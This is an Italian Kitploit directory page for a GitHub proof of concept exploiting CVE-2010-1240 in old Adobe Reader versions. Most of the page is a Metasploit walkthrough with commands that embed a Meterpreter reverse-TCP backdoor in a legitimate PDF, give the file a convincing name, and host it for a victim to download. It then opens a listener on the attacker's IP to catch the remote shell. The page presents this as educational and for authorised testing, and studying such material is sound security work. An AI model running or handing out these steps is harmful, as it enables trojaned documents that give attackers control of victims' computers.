Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2010-1240 — Proof-of-concept didattico che dimostra come incorporare una backdoor Meterpreter in un file PDF sfruttando CVE-2010-1240, con istruzioni passo-passo di Metasploit per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/asepsaepdin/cve-2010-1240
Strumenti di PhishingFramework di ExploitSfruttamento di Applicazioni WebPenetration TestingIngegneria SocialeSviluppo Payload
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Proof-of-concept didattico che dimostra come incorporare una backdoor Meterpreter in un file PDF sfruttando CVE-2010-1240, con istruzioni passo-passo di Metasploit per test di sicurezza autorizzati.

Vedi Repository
11613 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2010-1240 - Inserimento di backdoor in un PDF

Python


⚠️ Solo a scopo didattico e per ricerche di sicurezza autorizzate

Descrizione

Adobe Reader e Acrobat 9.x precedenti a 9.3.3, e 8.x precedenti a 8.2.3 su Windows e Mac OS X, non limitano il contenuto di un campo di testo nella finestra di avviso di apertura file, rendendo più facile per aggressori remoti ingannare gli utenti inducendoli a eseguire un programma locale arbitrario specificato in un documento PDF, come dimostrato da un campo di testo che afferma che il pulsante Apri consentirà all'utente di leggere un messaggio crittografato.

Demo

Animation

Guide passo-passo

  1. Per prima cosa, esegui msfconsole

    msfconsole
    
  2. Quindi, imposta il payload per l'incorporamento nel pdf

    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. imposta l'opzione INFILENAME e fornisci il percorso diretto del file pdf originale

    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. imposta il nome del nuovo file PDF malevolo creato con un nome più convincente impostando l'opzione FILENAME

    set FILENAME laporan.pdf
    
  5. Trova e incorpora il payload nel file PDF

    set payload windows/meterpreter/reverse_tcp
    
  6. Imposta l'opzione LHOST con l'IP dell'attaccante

    set LHOST 172.16.10.10
    
  7. Apri un nuovo terminale e naviga fino alla posizione del file PDF malevolo

    cd .msf4/local/
    
  8. Crea un server temporaneo in python

    python -m http.server
    
  9. Scarica il file PDF malevolo sulla macchina vittima

    http://172.16.10.10:8000/certificate.pdf
    
  10. Prima di eseguire il file PDF malevolo sulla macchina vittima, avvia il listener sul terminale precedente

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. Una volta che il file PDF malevolo viene eseguito sulla macchina vittima, ti darà una connessione alla macchina vittima

Crediti

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Scarica lo strumento